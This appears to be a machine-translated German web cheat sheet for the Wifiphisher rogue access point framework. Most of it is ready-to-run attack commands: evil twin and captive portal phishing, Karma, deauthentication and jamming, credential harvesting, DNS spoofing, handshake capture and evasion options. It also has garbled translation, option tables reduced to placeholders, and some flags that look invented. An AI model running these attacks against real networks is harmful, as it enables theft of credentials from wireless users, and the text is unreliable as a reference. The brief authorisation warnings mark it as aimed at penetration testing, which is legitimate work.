Zum Inhalt

Wifiphisher Wireless Phishing Framework Cheat Sheet

_

Im Überblick

Wifiphisher ist ein Rogue Access Point-Framework für die Durchführung von roten Team-Verlobungen oder Wi-Fi-Sicherheitstests. Es erzeugt gefälschte drahtlose Netzwerke, um automatisierte Phishing-Angriffe gegen drahtlose Clients durchzuführen, Anmeldeinformationen zu erfassen und Man-in-the-Middle-Angriffe durchzuführen.

ZEITSCHRIFTEN Warning: Dieses Tool ist nur für autorisierte Penetrationstests und drahtlose Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

• Installation

Das ist der Grund.

```bash

Install from repositories

sudo apt update sudo apt install wifiphisher

Install additional dependencies

sudo apt install hostapd dnsmasq ```_

Ubuntu/Debian

```bash

Install dependencies

sudo apt update sudo apt install python3 python3-pip git hostapd dnsmasq

Clone repository

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher

Install Python dependencies

pip3 install -r requirements.txt

Install Wifiphisher

sudo python3 setup.py install ```_

Manuelle Installation

```bash

Install required packages

sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

Clone and install

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python3 setup.py install ```_

Docker Installation

```bash

Build Docker image

git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher docker build -t wifiphisher .

Run with network privileges

docker run --rm -it --net=host --privileged wifiphisher ```_

oder Basisnutzung

Simple Rogue AP Attack

```bash

Basic attack with automatic target selection

sudo wifiphisher

Attack specific network

sudo wifiphisher -t "Target_Network"

Use specific interface

sudo wifiphisher -i wlan0

Use custom template

sudo wifiphisher -p firmware-upgrade ```_

Interface Management

```bash

List available interfaces

sudo wifiphisher --list-interfaces

Use specific interfaces

sudo wifiphisher -i wlan0 -jI wlan1

Monitor mode setup

sudo airmon-ng start wlan0 sudo wifiphisher -i wlan0mon ```_

Befehlsnummer

Basisoptionen

Option Description
INLINE_CODE_37 Target network ESSID
INLINE_CODE_38 Wireless interface
INLINE_CODE_39 Interface for jamming
INLINE_CODE_40 Phishing template
INLINE_CODE_41 WPA/WPA2 pre-shared key
INLINE_CODE_42 Quit on credential capture
_
### Erweiterte Optionen
Option Description
-------- -------------
INLINE_CODE_43 AP interface
INLINE_CODE_44 Disable jamming
INLINE_CODE_45 Access Point ESSID
INLINE_CODE_46 Deauth specific ESSID
INLINE_CODE_47 Deauth channels
INLINE_CODE_48 Disable extensions

Logging Options

Option Description
INLINE_CODE_49 Enable logging
INLINE_CODE_50 Log file path
INLINE_CODE_51 Credential log path
INLINE_CODE_52 Log captured credentials

Phishing Vorlagen

Verfügbare Vorlagen

```bash

List available templates

sudo wifiphisher --list-phishing-scenarios

Common templates:

- firmware-upgrade: Router firmware upgrade

- oauth-login: OAuth login page

- wifi-connect: WiFi connection page

- browser-plugin-update: Browser plugin update

- network-manager-connect: Network manager

```_

Firmware Upgrade Template

```bash

Use firmware upgrade scenario

sudo wifiphisher -p firmware-upgrade -t "Target_Network"

This template:

- Creates fake router admin page

- Requests admin credentials

- Simulates firmware upgrade process

```_

OAuth Login Template

```bash

Use OAuth login scenario

sudo wifiphisher -p oauth-login -t "Target_Network"

This template:

- Creates fake OAuth login page

- Captures social media credentials

- Redirects to legitimate service

```_

Custom Template Creation

```bash

Template directory structure

/usr/share/wifiphisher/data/phishing-pages/custom-template/ ├── config.ini ├── html/ │ ├── index.html │ ├── style.css │ └── script.js └── static/ └── images/ ```_

Template Configuration (config.ini)

```ini [info] Name = Custom Template Description = Custom phishing template Language = en

[context]

Template-specific settings

ESSID = \\{ESSID\\} MAC = \\{MAC\\} CHANNEL = \\{CHANNEL\\} ```_

In den Warenkorb

Evil Twin Attack

```bash

Create evil twin of target network

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

With specific MAC address

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

With channel specification

sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6 ```_

Captive Portal Attack

```bash

Create captive portal

sudo wifiphisher -e "Free_WiFi" -p wifi-connect

Custom captive portal

sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

Corporate network simulation

sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect ```_

WPA/WPA2 Handshake Capture

```bash

Capture handshakes while phishing

sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

Specify handshake output file

sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/ ```_

Karma Angriff

```bash

Respond to all probe requests

sudo wifiphisher --karma

Karma with specific template

sudo wifiphisher --karma -p oauth-login

Karma with custom ESSID list

sudo wifiphisher --karma --essid-list /path/to/essid_list.txt ```_

Jamming und Deauthentik

Targeted Deauthentication

```bash

Deauth specific network

sudo wifiphisher -dE "Target_Network"

Deauth specific client

sudo wifiphisher -dC 00:11:22:33:44:55

Deauth on specific channels

sudo wifiphisher --deauth-channels 1,6,11 ```_

Jamming Configuration

```bash

Use separate interface for jamming

sudo wifiphisher -i wlan0 -jI wlan1

Disable jamming

sudo wifiphisher -nJ

Custom jamming parameters

sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11 ```_

Smart Jamming

```bash

Intelligent jamming based on target

sudo wifiphisher -t "Target_Network" --smart-jamming

Adaptive jamming

sudo wifiphisher --adaptive-jamming --jam-threshold 5 ```_

Erweiterungen und Plugins

Verfügbare Erweiterungen

```bash

List available extensions

sudo wifiphisher --list-extensions

Common extensions:

- credentialharvester: Capture credentials

- handshakecapture: Capture WPA handshakes

- dnsmasqhandler: DNS spoofing

- captiveportal: Captive portal functionality

```_

Credential Harvester

```bash

Enable credential harvesting

sudo wifiphisher -p oauth-login --credentialharvester

Custom credential log

sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log ```_

Handshake Capture Extension

```bash

Enable handshake capture

sudo wifiphisher -t "Target_Network" --handshakecapture

Specify capture directory

sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/ ```_

DNS Spoofing Extension

```bash

Enable DNS spoofing

sudo wifiphisher --dnsmasqhandler

Custom DNS configuration

sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf ```_

Individuelle Vorlagenentwicklung

HTML Template Structure

```html

Router Configuration

Router Firmware Update

Network: \\\\{ESSID\\\\}

```_

CSS Styling

```css /* style.css */ body \\{ font-family: Arial, sans-serif; background: #f0f0f0; margin: 0; padding: 50px; \\}

.container \\{ max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); \\}

input \\{ width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; \\}

button \\{ width: 100%; background: #007cba; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; \\} ```_

JavaScript Functionality

```javascript // script.js document.addEventListener('DOMContentLoaded', function() \\{ // Add form validation const form = document.querySelector('form'); form.addEventListener('submit', function(e) \\{ const username = document.querySelector('input[name="username"]').value; const password = document.querySelector('input[name="password"]').value;

    if (!username||!password) \\\\{
        e.preventDefault();
        alert('Please enter both username and password');
    \\\\}
\\\\});

// Simulate loading
setTimeout(function() \\\\{
    document.querySelector('.container').style.opacity = '1';
\\\\}, 500);

\\}); ```_

Überwachung und Protokollierung

Echtzeitüberwachung

```bash

Monitor in real-time

sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

Monitor with verbose output

sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

Monitor specific log file

tail -f /var/log/wifiphisher.log ```_

Credential Logging

```bash

Enable credential logging

sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

Monitor captured credentials

tail -f /tmp/credentials.log

Parse credential log

grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4 ```_

Verkehrsanalyse

```bash

Capture network traffic

sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

Analyze with Wireshark

wireshark /tmp/wifiphisher_traffic.pcap

Extract HTTP credentials

tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' ```_

Evasion Techniques

MAC Address Randomization

```bash

Use random MAC address

sudo wifiphisher -t "Target_Network" --random-mac

Use specific MAC address

sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

Clone target AP MAC

sudo wifiphisher -t "Target_Network" --clone-mac ```_

Channel Hopping

```bash

Use channel hopping

sudo wifiphisher --channel-hop

Specific channel sequence

sudo wifiphisher --channel-sequence 1,6,11,1,6,11

Random channel selection

sudo wifiphisher --random-channel ```_

Timing Evasion

```bash

Delayed start

sudo wifiphisher -t "Target_Network" --delay 300

Random intervals

sudo wifiphisher -t "Target_Network" --random-intervals

Burst mode

sudo wifiphisher -t "Target_Network" --burst-mode ```_

Fehlerbehebung

Interface Issues

```bash

Check interface status

iwconfig

Reset interface

sudo ifconfig wlan0 down sudo ifconfig wlan0 up

Check for monitor mode support

sudo iw list|grep -A 10 "Supported interface modes"

Kill conflicting processes

sudo airmon-ng check kill ```_

Berechtigungsfragen

```bash

Check permissions

ls -la /usr/bin/wifiphisher

Fix permissions

sudo chmod +x /usr/bin/wifiphisher

Check sudo configuration

sudo visudo ```_

Abhängigkeitsfragen

```bash

Check Python dependencies

pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

Reinstall dependencies

pip3 install --upgrade -r requirements.txt

Check system packages

dpkg -l|grep -E "(hostapd|dnsmasq)" ```_

Network Issues

```bash

Check network configuration

ip addr show

Check routing table

ip route show

Test internet connectivity

ping -c 4 8.8.8.8

Check DNS resolution

nslookup google.com ```_

Rechtliche und ethische Überlegungen

Zulassungsanforderungen

```bash

Always obtain written authorization

Document scope and limitations

Follow responsible disclosure

Respect privacy and data protection laws

```_

Best Practices

```bash

Use only for authorized testing

Minimize impact on legitimate users

Provide immediate feedback and education

Secure captured data appropriately

Follow industry standards and guidelines

```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Wifiphisher. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie kabellose Sicherheitsbewertungen durchführen. *